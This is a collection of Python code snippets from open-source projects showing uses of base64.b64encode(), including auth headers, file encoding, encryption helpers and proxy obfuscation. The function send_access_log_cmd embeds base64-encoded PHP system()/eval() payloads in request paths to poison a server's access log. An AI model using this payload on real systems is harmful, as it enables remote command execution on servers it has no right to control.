我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用base64.b64encode()。
def copy_from_host(module):
    """Read a local file and hand its encoded content to ``module.exit_json``.

    The path is taken from ``module.params['src']``. When
    ``module.params['compress']`` is truthy the payload is zlib-compressed
    before being base64-encoded. The SHA-1 is always computed over the raw
    (uncompressed) bytes. Missing or unreadable files are reported through
    ``module.fail_json``.
    """
    compress = module.params.get('compress')
    src = module.params.get('src')

    if not os.path.exists(src):
        module.fail_json(msg="file not found: {}".format(src))
    if not os.access(src, os.R_OK):
        module.fail_json(msg="file is not readable: {}".format(src))

    # Permission bits only, rendered with oct().
    mode = oct(os.stat(src).st_mode & 0o777)

    with open(src, 'rb') as handle:
        raw_data = handle.read()

    sha1 = hashlib.sha1(raw_data).hexdigest()
    payload = raw_data
    if compress:
        payload = zlib.compress(raw_data)

    module.exit_json(
        content=base64.b64encode(payload),
        sha1=sha1,
        mode=mode,
        source=src
    )
def save(self, buffer):
    """Upload *buffer* as an object named ``self.prefix`` + ``buffer.path``.

    The base64 text of ``buffer.md5`` is sent as ``md5Hash`` and
    ``buffer.count`` is stored, as a string, under the ``count`` metadata key.
    """
    object_name = urljoin(self.prefix, buffer.path)
    payload = buffer.get_rewound_file()
    encoded_md5 = base64.b64encode(buffer.md5).decode('ascii')

    request_body = {
        'md5Hash': encoded_md5,
        'metadata': {
            'count': str(buffer.count),
        },
    }
    upload = http.MediaIoBaseUpload(payload, 'application/octet-stream')
    request = self.objects.insert(
        media_body=upload,
        name=object_name,
        body=request_body,
        bucket=self.bucket
    )
    request.execute()
def get_encryption():
    """Return a text template of AES encrypt/decrypt helpers with values filled in.

    The ``{0}``, ``{1}`` and ``{2}`` placeholders of the template are replaced
    with ``st_obf[0]``, ``aes_encoded`` and ``aes_abbrev`` (module-level names
    defined outside this block).
    """
    # NOTE(review): in this view the template literal sits on one line; if the
    # upstream file has line breaks inside the triple quotes they must be
    # restored from there -- confirm before relying on the generated text.
    return ''' import base64 from Crypto import Random from Crypto.Cipher import AES abbrev = '{2}' {0} = base64.b64decode('{1}') def encrypt(raw): iv = Random.new().read( AES.block_size ) cipher = AES.new({0}, AES.MODE_CFB, iv ) return (base64.b64encode( iv + cipher.encrypt( raw ) ) ) def decrypt(enc): enc = base64.b64decode(enc) iv = enc[:16] cipher = AES.new({0}, AES.MODE_CFB, iv ) return cipher.decrypt( enc[16:] ) '''.format(st_obf[0],aes_encoded,aes_abbrev)

################################################################################
# st_protocol.py stitch_gen variables #
################################################################################
def encode_public_key(self):
    """
    Return the public key gzip-compressed and then base64-encoded.

    ``None`` is returned when writing ``self.public_pem()`` raises a
    TypeError (the key was not initialized yet).
    """
    buffer_obj = StringIO()
    gz_stream = GzipFile(fileobj=buffer_obj, mode="wb")
    try:
        gz_stream.write(self.public_pem())
    except TypeError:
        # It wasn't initialized yet
        return None
    finally:
        # Closing flushes the gzip trailer into the buffer.
        gz_stream.close()

    return b64encode(buffer_obj.getvalue())
def handleServerCall(self, payload):
    """Dispatch a JSON command received from the server.

    ``payload`` is a JSON document. When it contains a ``"command"`` key the
    value selects the action: ``blink`` and ``reboot`` are only logged,
    ``photo`` reads the photo file and sends it base64-encoded through
    ``self.service.sendMessage``; any other value is logged as unknown.
    Payloads without a ``"command"`` key are ignored after the initial log.
    """
    self.logger.info("Handling server callback with payload {0}".format(payload))
    payloadDict = json.loads(payload)
    if "command" not in payloadDict:
        return

    command = payloadDict["command"]
    self.logger.info("Received command: {0}".format(command))
    if command == "blink":
        self.logger.info("BLINK!!!")
    elif command == "reboot":
        self.logger.info("REBOOT!!!")
    elif command == "photo":
        self.logger.info("PHOTO!!!")
        photoFile = "/home/pi/puszcz.jpg"
        with open(photoFile, mode='rb') as photo:
            photoData = photo.read()
        # b64encode() returns bytes on Python 3 and json.dumps() rejects
        # bytes; decode to text so the message serializes on 2 and 3 alike.
        base64data = base64.b64encode(photoData).decode('ascii')
        self.service.sendMessage(json.dumps({'image': base64data, 'type': 'jpg'}))
    else:
        self.logger.info("Command '{0}' unknown".format(command))
def encode_primitive(self, validator, value):
    """Return *value* in the form used for serialization under *validator*.

    If *validator* has an entry in ``self.alias_validators`` that callable is
    invoked with *value* first. Void yields ``None``, timestamps are formatted
    with the validator's format, bytes are base64 text unless
    ``self.for_msgpack`` is set, and everything else passes through.
    """
    if validator in self.alias_validators:
        self.alias_validators[validator](value)

    if isinstance(validator, bv.Void):
        return None
    if isinstance(validator, bv.Timestamp):
        return _strftime(value, validator.format)
    if isinstance(validator, bv.Bytes):
        if self.for_msgpack:
            return value
        return base64.b64encode(value).decode('ascii')
    if isinstance(validator, bv.Integer) and isinstance(value, bool):
        # bool is a subclass of int, so it passes Integer validation; emit
        # it as 0 or 1 instead of False or True.
        return int(value)
    return value
def main(args):
    """Load optional settings, then start the HTTP(S) server and serve forever.

    ``args`` is a sequence of command-line arguments; when non-empty its
    first element is passed to ``load_settings``. If ``CREDENTIALS`` is set it
    is replaced by its base64 form and the authenticating handler is used.
    With ``SSL_CERTIFICATE`` set the listening socket is wrapped in TLS.
    """
    global HTTPD, CREDENTIALS
    if args:
        load_settings(args[0])
    print("Starting server")
    server_address = (LISTENIP, LISTENPORT)
    if CREDENTIALS:
        CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8"))
        Handler = AuthHandler
    else:
        Handler = RequestHandler
    if not SSL_CERTIFICATE:
        HTTPD = HTTPServer(server_address, Handler)
    else:
        HTTPD = socketserver.TCPServer(server_address, Handler)
        # ssl.wrap_socket() was deprecated in Python 3.7 and removed in 3.12;
        # an explicit server-side SSLContext is the supported replacement.
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        context.load_cert_chain(certfile=SSL_CERTIFICATE,
                                keyfile=SSL_KEY or None)
        HTTPD.socket = context.wrap_socket(HTTPD.socket, server_side=True)
    print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http',
                                        LISTENIP,
                                        LISTENPORT))
    if BASEPATH:
        os.chdir(BASEPATH)
    HTTPD.serve_forever()
def vPrint(actor, sent, otherActor, toPrint, base64encode=True):
    """Print a labelled, length-limited view of *toPrint* when VERBOSE is set.

    The label shows the direction between *actor* and *otherActor* and is
    padded to 12 characters. Strings and lists of strings are optionally
    base64-encoded and cut off around 100 characters.
    """
    if not VERBOSE:
        return

    direction = "->" if sent else "<-"
    label = ("%s %s %s" % (actor, direction, otherActor)).ljust(12)

    if type(toPrint) == str:
        if base64encode:
            toPrint = b64encode(toPrint)
        if len(toPrint) > 100:
            toPrint = toPrint[:100] + "..."
    elif type(toPrint) == list:
        shown = []
        for item in toPrint:
            if len(item) < 100:
                shown.append(b64encode(item) if base64encode else item)
            else:
                # Long items are truncated before encoding.
                head = item[:100]
                shown.append((b64encode(head) if base64encode else head) + '...')
        toPrint = shown

    print("%s: <%s>" % (label, toPrint))
def _http_headers(self):
    """Build the HTTP headers needed to reach this Connection's endpoint.

    :return: ``{}`` when ``self.usertag`` is falsy, otherwise a dictionary
        with a single Basic ``Authorization`` entry
    """
    if self.usertag:
        secret = self.password or ''
        raw_creds = u'{}:{}'.format(self.usertag, secret).encode()
        encoded = base64.b64encode(raw_creds).decode()
        return {'Authorization': 'Basic {}'.format(encoded)}
    return {}
def __init__(self, **kwargs):
    """Store the feed descriptor fields and inline any icon files.

    All keyword arguments are kept in ``self.data``. For the ``icon`` and
    ``icon_small`` fields, when the value is a path that exists on disk, the
    path is replaced by the base64-encoded content of that file.

    Raises:
        CbIconError: if an existing icon file cannot be read or encoded.
    """
    # these fields are required in every feed descriptor
    self.required = ["name", "display_name",
                     "summary", "tech_data", "provider_url"]
    self.optional = ["category", "icon", "version", "icon_small"]
    self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"]
    self.data = kwargs

    # if they are present, set the icon fields of the data to hold
    # the base64 encoded file data from their path
    for icon_field in ["icon", "icon_small"]:
        if icon_field in self.data and os.path.exists(self.data[icon_field]):
            icon_path = self.data.pop(icon_field)
            try:
                # The context manager closes the handle even when reading
                # fails; the bare open().read() left that to the GC.
                with open(icon_path, "rb") as icon_file:
                    self.data[icon_field] = base64.b64encode(icon_file.read())
            except Exception as err:
                raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
def send_access_log_cmd(cmd, host, keyword):
    """Issue a GET or HEAD request to *host* whose path embeds *cmd*.

    *keyword* selects the path template (presence of ``_PHP``) and the HTTP
    verb (presence of ``GET``); anything else results in a HEAD request.
    """
    if "_PHP" in keyword:
        keyword = keyword[:-4]
        if " " in cmd:
            b64cmd = base64.b64encode(cmd)
            path = "/<?php eval(base64_decode('%s'));?>" % b64cmd
        else:
            path = "/<?php %s?>" % cmd
    else:
        b64cmd = base64.b64encode(cmd)
        path = "/<?php system(base64_decode('%s'));?>" % b64cmd

    session = NoURLEncodingSession()
    url = "%s/%s" % (host, path)
    send = session.get if "GET" in keyword else session.head
    send(url, headers=gen_headers)
def sensu_event_resolve(message):
    """POST a resolve request for ``message['entity']`` to the Sensu API.

    ``message['entity']`` is split on ``:`` into client and check names. A
    202 response releases the connection; any other status is logged. Every
    exception is logged and re-raised.
    """
    endpoint = settings.SENSU_API_URL + '/resolve'
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    token = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % token
    }

    try:
        client_name, check_name = message['entity'].split(':')
        body = json.dumps({"client": client_name, "check": check_name})
        reply = http.request('POST', endpoint, body=body, headers=headers)
        status = reply.status

        if status == 202:
            reply.release_conn()
        else:
            logger.error('response: %s' % str(status))
    except:
        # Catch-all kept on purpose: log whatever happened, then propagate.
        logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity'])
        raise
def sensu_client_delete(message):
    """DELETE the client named ``message['client']`` through the Sensu API.

    Returns True on a 202 response (after releasing the connection) and
    False, with an error log, for any other status. Every exception is
    logged and re-raised.
    """
    endpoint = settings.SENSU_API_URL + '/clients/' + message['client']
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    token = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % token
    }

    try:
        reply = http.request('DELETE', endpoint, headers=headers)
        status = reply.status

        if status != 202:
            logger.error("sensu_client_delete api request failed: %s" % str(status))
            return False

        reply.release_conn()
        return True
    except:
        # Catch-all kept on purpose: log whatever happened, then propagate.
        logger.error("sensu_client_delete failed deleting client: %s" % message['client'])
        raise
def sensu_result_delete(message):
    """DELETE the result for ``message['client']`` / ``message['check']``.

    Returns True on a 204 response (after releasing the connection) and
    False, with an error log, for any other status. Every exception is
    logged and re-raised.
    """
    endpoint = (settings.SENSU_API_URL + '/results/' + message['client']
                + '/' + message['check'])
    credentials = "%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD)
    token = base64.b64encode(credentials.encode()).decode("ascii")
    headers = {
        'X_REQUESTED_WITH': 'XMLHttpRequest',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Authorization': 'Basic %s' % token
    }

    try:
        reply = http.request('DELETE', endpoint, headers=headers)
        status = reply.status

        if status != 204:
            logger.error("sensu_result_delete api request failed: %s" % str(status))
            return False

        reply.release_conn()
        return True
    except:
        # Catch-all kept on purpose: log whatever happened, then propagate.
        logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check']))
        raise
def __init__(self):
    """Set the provider's static settings, API paths and auth headers.

    The user name and password come from ``control.setting`` and are sent
    as a Basic ``Authorization`` header.
    """
    self.priority = 1
    self.language = ['en']
    self.domains = ['ororo.tv']
    self.base_link = 'https://ororo.tv'

    # API endpoints, relative to base_link.
    self.moviesearch_link = '/api/v2/movies'
    self.tvsearch_link = '/api/v2/shows'
    self.movie_link = '/api/v2/movies/%s'
    self.show_link = '/api/v2/shows/%s'
    self.episode_link = '/api/v2/episodes/%s'

    self.user = control.setting('ororo.user')
    self.password = control.setting('ororo.pass')

    credentials = '%s:%s' % (self.user, self.password)
    self.headers = {
        'Authorization': 'Basic %s' % base64.b64encode(credentials),
        'User-Agent': 'Exodus for Kodi'
    }
def _to_json(self, strip, to_serialize=None):
    """Create the JSON representation of this credentials object.

    The PKCS#12 key value, when present, is base64-encoded before the
    parent implementation serializes the properties.

    Args:
        strip: array, names of members to exclude from the JSON.
        to_serialize: dict, (Optional) the properties to serialize; when
            omitted a shallow copy of ``self.__dict__`` is used. A dict
            passed in by the caller is modified in place.

    Returns:
        string, whatever the parent class's ``_to_json`` returns.
    """
    payload = to_serialize
    if payload is None:
        payload = copy.copy(self.__dict__)

    raw_key = payload.get(_PKCS12_KEY)
    if raw_key is not None:
        payload[_PKCS12_KEY] = base64.b64encode(raw_key)

    parent = super(ServiceAccountCredentials, self)
    return parent._to_json(strip, to_serialize=payload)
def get_console_log(session, arg_dict):
    """Return the tail of a domain's console log, zlib-compressed and base64-encoded.

    ``arg_dict['dom_id']`` selects the log file via CONSOLE_LOG_FILE_PATTERN.
    ``session`` is not used in this function.

    Raises dom0_pluginlib.PluginError when ``dom_id`` is missing, is not an
    integer, or when reading the log raises IOError.
    """
    try:
        raw_dom_id = arg_dict['dom_id']
    except KeyError:
        raise dom0_pluginlib.PluginError("Missing dom_id")
    try:
        dom_id = int(raw_dom_id)
    except ValueError:
        raise dom0_pluginlib.PluginError("Invalid dom_id")

    logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb')
    # NOTE(review): the nested try/except inside try/finally and the
    # "except IOError, e" spelling look like deliberate compatibility with an
    # old Python 2 interpreter -- confirm before modernizing this block.
    try:
        try:
            log_content = _last_bytes(logfile)
        except IOError, e:  # noqa
            msg = "Error reading console: %s" % e
            logging.debug(msg)
            raise dom0_pluginlib.PluginError(msg)
    finally:
        # Always release the file handle, including on the error path.
        logfile.close()

    return base64.b64encode(zlib.compress(log_content))
def test_inject_file_with_old_agent(self):
    # With only the "injectfile" feature reported, inject_file is expected to
    # write a record whose value is base64("<path>,<contents>").

    # NOTE: this is an alias, not a copy -- FAKE_ARG_DICT itself is updated.
    expected_args = FAKE_ARG_DICT
    request_id = expected_args["id"]
    raw_path = base64.b64decode(expected_args["b64_path"])
    raw_file = base64.b64decode(expected_args["b64_contents"])
    new_b64 = base64.b64encode("%s,%s" % (raw_path, raw_file))

    self.mock_patch_object(self.agent,
                           '_get_agent_features',
                           'injectfile')
    expected_args["value"] = json.dumps({"name": "injectfile",
                                         "value": new_b64})
    expected_args["path"] = "data/host/%s" % request_id

    self.agent.inject_file(self.agent, FAKE_ARG_DICT)

    self.agent._wait_for_agent.assert_called_once()
    self.agent.xenstore.write_record.assert_called_with(self.agent,
                                                        expected_args)
    self.agent._get_agent_features.assert_called_once()
def client_udp_pre_encrypt(self, buf):
    """Encrypt an outgoing client UDP payload and append the auth trailer.

    On first use the user key/id are derived from
    ``self.server_info.protocol_param`` (``<uid>:<secret>``); when that is
    absent or unusable a random id and the server key are used instead.

    The returned packet is: RC4-encrypted *buf*, random padding, 3 bytes of
    random auth data, the 4-byte user id XOR-masked with the auth HMAC, and
    the first byte of an HMAC over everything before it.
    """
    if self.user_key is None:
        protocol_param = to_bytes(self.server_info.protocol_param)
        if b':' in protocol_param:
            try:
                # Split on a bytes separator: splitting bytes on a str raises
                # TypeError on Python 3, which the catch-all below used to
                # swallow, silently discarding the configured user key.
                items = protocol_param.split(b':')
                user_key = self.hashfunc(items[1]).digest()
                user_id = struct.pack('<I', int(items[0]))
            except Exception:
                # Best effort: an unusable parameter falls back to the
                # random id / server key below.
                pass
            else:
                # Assign both together so a half-parsed parameter can never
                # leave user_key set without a matching user_id.
                self.user_key = user_key
                self.user_id = user_id
        if self.user_key is None:
            self.user_id = os.urandom(4)
            self.user_key = self.server_info.key

    authdata = os.urandom(3)
    mac_key = self.server_info.key
    md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()

    # Mask the user id with the first four bytes of the auth HMAC.
    uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0]
    uid = struct.pack('<I', uid)

    rand_len = self.udp_rnd_data_len(md5data, self.random_client)
    encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
    out_buf = encryptor.encrypt(buf)
    buf = out_buf + os.urandom(rand_len) + authdata + uid
    return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
def server_udp_pre_encrypt(self, buf, uid):
    """Encrypt an outgoing server UDP payload and append the auth trailer.

    The key is the entry for *uid* in ``self.server_info.users`` when there
    is one; otherwise the server key (no users configured) or
    ``self.server_info.recv_iv`` (users configured, *uid* unknown).

    The returned packet is: RC4-encrypted *buf*, random padding, 7 bytes of
    random auth data, and the first byte of an HMAC over everything before
    it.
    """
    if uid in self.server_info.users:
        user_key = self.server_info.users[uid]
    else:
        uid = None
        if self.server_info.users:
            user_key = self.server_info.recv_iv
        else:
            user_key = self.server_info.key

    authdata = os.urandom(7)
    md5data = hmac.new(self.server_info.key, authdata, self.hashfunc).digest()
    rand_len = self.udp_rnd_data_len(md5data, self.random_server)

    rc4_key = to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data))
    cipher = encrypt.Encryptor(rc4_key, 'rc4')
    packet = cipher.encrypt(buf) + os.urandom(rand_len) + authdata
    tag = hmac.new(user_key, packet, self.hashfunc).digest()[:1]
    return packet + tag
def server_udp_post_decrypt(self, buf):
    """Verify and decrypt a client UDP packet.

    The last 8 bytes of *buf* are read as 3 bytes of auth data, a 4-byte
    masked user id and a 1-byte HMAC tag. Returns ``(payload, uid)``; *uid*
    is ``None`` when the id is not in ``self.server_info.users``. When the
    tag does not match, ``(b'', None)`` is returned.
    """
    authdata = buf[-8:-5]
    md5data = hmac.new(self.server_info.key, authdata, self.hashfunc).digest()

    # Undo the XOR mask applied to the user id by the sender.
    masked_uid = struct.unpack('<I', buf[-5:-1])[0]
    mask = struct.unpack('<I', md5data[:4])[0]
    uid = struct.pack('<I', masked_uid ^ mask)

    if uid in self.server_info.users:
        user_key = self.server_info.users[uid]
    else:
        uid = None
        if self.server_info.users:
            user_key = self.server_info.recv_iv
        else:
            user_key = self.server_info.key

    expected_tag = hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1]
    if expected_tag != buf[-1:]:
        return (b'', None)

    rand_len = self.udp_rnd_data_len(md5data, self.random_client)
    rc4_key = to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data))
    cipher = encrypt.Encryptor(rc4_key, 'rc4')
    # Drop the 8-byte trailer and the random padding before decrypting.
    payload = cipher.decrypt(buf[:-8 - rand_len])
    return (payload, uid)
def handshake_hmac_get(handshake_key, prefix, server_cookie, client_cookie):
    '''
    Compute HMAC(handshake_key, prefix | server_cookie | client_cookie)
    and return it base-64 encoded.
    The result is checked with handshake_hmac_verify before it is returned.
    '''
    cookies = server_cookie + client_cookie
    encoded_hmac = b64encode(get_hmac(handshake_key, prefix, cookies))
    assert PrivCountProtocol.handshake_hmac_verify(encoded_hmac,
                                                   handshake_key,
                                                   prefix,
                                                   server_cookie,
                                                   client_cookie)
    return encoded_hmac
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set when the
              'https-service-endpoints' option is enabled, otherwise an
              empty dictionary
    """
    ca_data = {}
    endpoints_option = config('https-service-endpoints')
    if not (endpoints_option and bool_from_string(endpoints_option)):
        return ca_data

    # Pass CA cert as client will need it to
    # verify https connections
    bundle = get_ca(user=SSH_USER).get_ca_bundle()
    ca_data['https_keystone'] = 'True'
    ca_data['ca_cert'] = b64encode(bundle)
    return ca_data
def get_disqus_sso_payload(user):
    """Build the Disqus single-sign-on values for *user*.

    Returns a ``(message, timestamp, signature, public_key)`` tuple, or four
    ``None`` values when either Disqus key is missing from the app config.
    A falsy *user* produces a message built from an empty JSON object.
    """
    public_key = current_app.config.get('DISQUS_PUBLIC_KEY')
    secret_key = current_app.config.get('DISQUS_SECRET_KEY')
    if not (public_key and secret_key):
        return None, None, None, None

    if user:
        profile = {
            'id': user.id,
            'username': user.name,
            'email': user.email_addr,
        }
    else:
        profile = {}

    # encode the data to base64
    message = base64.b64encode(simplejson.dumps(profile))
    # generate a timestamp for signing the message
    timestamp = int(time.time())
    # generate our hmac signature
    signed_text = '%s %s' % (message, timestamp)
    sig = hmac.HMAC(secret_key, signed_text, hashlib.sha1).hexdigest()
    return message, timestamp, sig, public_key
def generate_md5_file(md5_check_fn, scene_list):
    """Write base64-encoded MD5 digests of each scene's .ply and .log file.

    For every entry of *scene_list* two lines of the form
    ``<file>###<base64 digest>`` are written to *md5_check_fn*: first the
    ``.ply`` file, then the ``.log`` file. A file that does not exist gets
    an empty digest field. Each pair is also printed.
    """
    # The file is opened in binary mode, so every line is encoded before it
    # is written; writing text to a 'wb' handle raises TypeError on Python 3.
    with open(md5_check_fn, 'wb') as md5_check:
        for scene in scene_list:
            ply_file = scene + '.ply'
            log_file = scene + '.log'

            digests = []
            for path in (ply_file, log_file):
                if os.path.isfile(path):
                    raw_md5 = generate_file_md5(path, blocksize=2**20)
                else:
                    # bytes, not '': b64encode() rejects str on Python 3.
                    raw_md5 = b''
                digests.append(base64.b64encode(raw_md5))
            content_md5_ply, content_md5_log = digests

            print('md5_ply_file: ', ply_file, content_md5_ply)
            print('md5_log_file: ', log_file, content_md5_log)

            for path, digest in ((ply_file, content_md5_ply),
                                 (log_file, content_md5_log)):
                line = "%s###%s\n" % (path, digest.decode('UTF-8'))
                md5_check.write(line.encode('UTF-8'))
def _tag(value):
    """Recursively wrap *value* in tagged containers for serialization.

    Tuples, UUIDs, bytes, objects exposing ``__html__`` and datetimes become
    single-key dicts (keys ``' t'``, ``' u'``, ``' b'``, ``' m'``, ``' d'``);
    lists and dicts are rebuilt with their items tagged; anything else is
    returned unchanged. The order of the checks below is significant.
    """
    if isinstance(value, tuple):
        return {' t': [_tag(x) for x in value]}
    if isinstance(value, uuid.UUID):
        return {' u': value.hex}
    if isinstance(value, bytes):
        return {' b': b64encode(value).decode('ascii')}
    if callable(getattr(value, '__html__', None)):
        return {' m': text_type(value.__html__())}
    if isinstance(value, list):
        return [_tag(x) for x in value]
    if isinstance(value, datetime):
        return {' d': http_date(value)}
    if isinstance(value, dict):
        return dict((k, _tag(v)) for k, v in iteritems(value))
    if isinstance(value, str):
        try:
            return text_type(value)
        except UnicodeError:
            from flask.debughelpers import UnexpectedUnicodeError
            raise UnexpectedUnicodeError(u'A byte string with '
                u'non-ASCII data was passed to the session system '
                u'which can only store unicode strings.  Consider '
                u'base64 encoding your string (String was %r)' % value)
    return value
def html(self):
    """
    Render :attr:`self.file_obj` through one of the HTML templates, with the
    ``src`` value set to a base64 ``data:`` URI of the file's content.

    An empty unicode string is returned when there is no file object. The
    icon template is used when :attr:`self.thumbnail` is set.
    """
    if not self.file_obj:
        return u""

    self.file_obj.seek(0)
    # The data URI needs the content as base64 text.
    payload = base64.b64encode(self.file_obj.read()).decode('utf-8')
    data_uri = "data:{mimetype};base64,{encoded}".format(
        mimetype=self.mimetype, encoded=payload)

    link = "%s/%s" % (self.linkpath, os.path.basename(self.path))
    if self.original_file:
        # Prefer the original file's name for the link when available.
        link = "%s/%s" % (
            self.linkpath, os.path.basename(self.original_file.name))

    fields = dict(link=link, src=data_uri, mimetype=self.mimetype)
    if self.thumbnail:
        return self.html_icon_template.format(icon=self.thumbnail, **fields)
    return self.html_template.format(**fields)
def add(self, msg_text, to=None):
    """Append a news message, save, and push the change.

    Without *to* the text is stored as given. With *to* the text is sealed
    with that team's ``crypt_pk`` and stored base64-encoded together with
    the recipient name.
    """
    current_time = int(time.time())
    if to is not None:
        team_pk = Team(name=to)['crypt_pk']
        sealed = pysodium.crypto_box_seal(msg_text.encode("utf-8"), team_pk)
        message = {
            "msg": b64encode(sealed).decode("utf-8"),
            "to": to,
            "time": current_time,
        }
    else:
        message = {"msg": msg_text, "time": current_time}

    self.append(message)
    self.save()

    dest = message.get("to", "all")
    SubRepo.push(commit_message='Added news to %s' % dest, merge_request=False)
def set_conf(profile, username, password, hesperides_endpoint, response_format):
    """Write endpoint/format config and Basic-auth credentials for *profile*.

    The ``auth`` credential is the base64 text of ``username:password``.
    Afterwards an empty ``'config'`` section is also written.
    """
    raw_auth = ('%s:%s' % (username, password)).encode()
    basic_auth = base64.b64encode(raw_auth).decode('UTF-8')

    config_writer = ConfigFileWriter()
    config_writer.update_config(
        profile,
        {'endpoint': hesperides_endpoint, 'format': response_format},
        False)

    credentials_writer = ConfigFileWriter()
    credentials_writer.update_credentials(
        profile,
        {'username': username, 'auth': basic_auth},
        False)

    # NOTE(review): a third writer is created but the final update goes
    # through the first one -- confirm which writer was intended.
    unused_writer = ConfigFileWriter()
    config_writer.update_config('config', {}, False)
def encrypt(raw, aes_key=secret):
    """Encrypt *raw* with AES in CFB mode under a fresh random IV.

    Returns the base64 encoding of the IV followed by the ciphertext.
    """
    iv = Random.new().read(AES.block_size)
    ciphertext = AES.new(aes_key, AES.MODE_CFB, iv).encrypt(raw)
    return base64.b64encode(iv + ciphertext)
def login(cpf, password):
    """Authenticate against the login endpoint with *cpf* and *password*.

    The password is sent base64-encoded. Raises WebApiFailure when the
    response status is anything other than 200.
    """
    endpoint = 'https://www.meualelo.com.br/meualelo.services/rest/login/authenticate'
    payload = {
        'cpf': cpf,
        'pwd': base64.b64encode(password),
        'captchaResponse': '',
    }
    result = session.post(endpoint, json=payload)
    if result.status_code == 200:
        return
    raise WebApiFailure()
def headers(self):
    """Return the parent's request headers plus a Basic Authorization entry."""
    encoding = 'utf8'
    headers = super().headers
    credentials = '{}:{}'.format(self.username, self.password)
    token = b64encode(credentials.encode(encoding))
    headers['Authorization'] = 'Basic {}'.format(token.decode(encoding))
    return headers
def submit_sample(self, filepath, filename, tags=['JAMIE_Import', 'TheHive_Import']):
    """
    Uploads a new sample to VMRay api. Filename gets sent base64 encoded.

    :param filepath: path to sample
    :type filepath: str
    :param filename: filename of the original file
    :type filename: str
    :param tags: List of tags to apply to the sample (never modified here)
    :type tags: list(str)
    :returns: Dictionary of results
    :rtype: dict
    :raises SampleFileNotFoundError: if *filepath* is not an existing file
    :raises BadResponseError: if the response status is not HTTP 200
    """
    apiurl = '/rest/sample/submit?sample_file'
    params = {'sample_filename_b64enc': base64.b64encode(filename.encode('utf-8')),
              'reanalyze': self.reanalyze}
    if tags:
        params['tags'] = ','.join(tags)

    if not os.path.isfile(filepath):
        raise SampleFileNotFoundError('Given sample file was not found.')

    # Close the sample handle as soon as the upload returns; it used to be
    # opened inline and never closed.
    with open(filepath, mode='rb') as sample:
        res = self.session.post(url=self.url + apiurl,
                                files=[('sample_file', sample)],
                                params=params)

    if res.status_code == 200:
        return json.loads(res.text)
    raise BadResponseError('Response from VMRay was not HTTP 200.'
                           ' Responsecode: {}; Text: {}'.format(res.status_code, res.text))
def encrypt(pubkey, password):
    """Encrypt *password* with the given public key and base64-encode it.

    The key is loaded with ``load_key`` and the encryption uses PKCS1v15
    padding, so only the holder of the matching private key can recover
    the password.
    """
    ciphertext = load_key(pubkey).encrypt(password, PKCS1v15())
    return base64.b64encode(ciphertext)
def encode_private_key(self):
    """
    Return the private key gzip-compressed and then base64-encoded.

    ``None`` is returned when writing ``self.private_pem()`` raises a
    TypeError (the key was not initialized yet).
    """
    buffer_obj = StringIO()
    gz_stream = GzipFile(fileobj=buffer_obj, mode="wb")
    try:
        gz_stream.write(self.private_pem())
    except TypeError:
        # It wasn't initialized yet
        return None
    finally:
        # Closing flushes the gzip trailer into the buffer.
        gz_stream.close()

    return b64encode(buffer_obj.getvalue())
def encrypt(raw):
    """Pad *raw*, encrypt it with AES-CBC under KEY and a fresh random IV.

    Returns the base64 encoding of the IV followed by the ciphertext.
    """
    padded = pad(raw)
    iv = Random.new().read(AES.block_size)
    ciphertext = AES.new(KEY, AES.MODE_CBC, iv).encrypt(padded)
    return base64.b64encode(iv + ciphertext)
def encrypt(plaintext):
    """Encrypt *plaintext* via ``kms.encrypt`` under KMS_KEY_ID.

    Returns the base64 encoding of the response's ``CiphertextBlob``.
    """
    response = kms.encrypt(KeyId=KMS_KEY_ID, Plaintext=plaintext)
    return base64.b64encode(response['CiphertextBlob'])
def _b64_encode_bytes(b):
    """Return the base64 encoding of the bytes *b* as an ASCII text string."""
    encoded = base64.b64encode(b)
    return encoded.decode("ascii")
def encrypt(text):
    """Encrypt the string *text* with AES-CFB and return base64 text.

    Key and IV both come from ``settings`` (CRYPT_KEY and CRYPT_IV).
    """
    cipher = AES.new(settings.CRYPT_KEY, AES.MODE_CFB, settings.CRYPT_IV)
    ciphertext = cipher.encrypt(text.encode())
    return base64.b64encode(ciphertext).decode()
def _FieldToJsonObject(self, field, value):
    """Convert one field value to its JSON-compatible form.

    Messages are converted recursively, enums become their value name,
    bytes become base64 text, booleans are coerced with ``bool``, 64-bit
    integer types become strings, and infinite/NaN floats become the
    module's marker constants. Other values are returned unchanged.

    Raises SerializeToJsonError for an enum number with no matching value.
    """
    field_desc = descriptor.FieldDescriptor
    cpp_type = field.cpp_type

    if cpp_type == field_desc.CPPTYPE_MESSAGE:
        return self._MessageToJsonObject(value)

    if cpp_type == field_desc.CPPTYPE_ENUM:
        enum_value = field.enum_type.values_by_number.get(value, None)
        if enum_value is None:
            raise SerializeToJsonError('Enum field contains an integer value '
                                       'which can not mapped to an enum value.')
        return enum_value.name

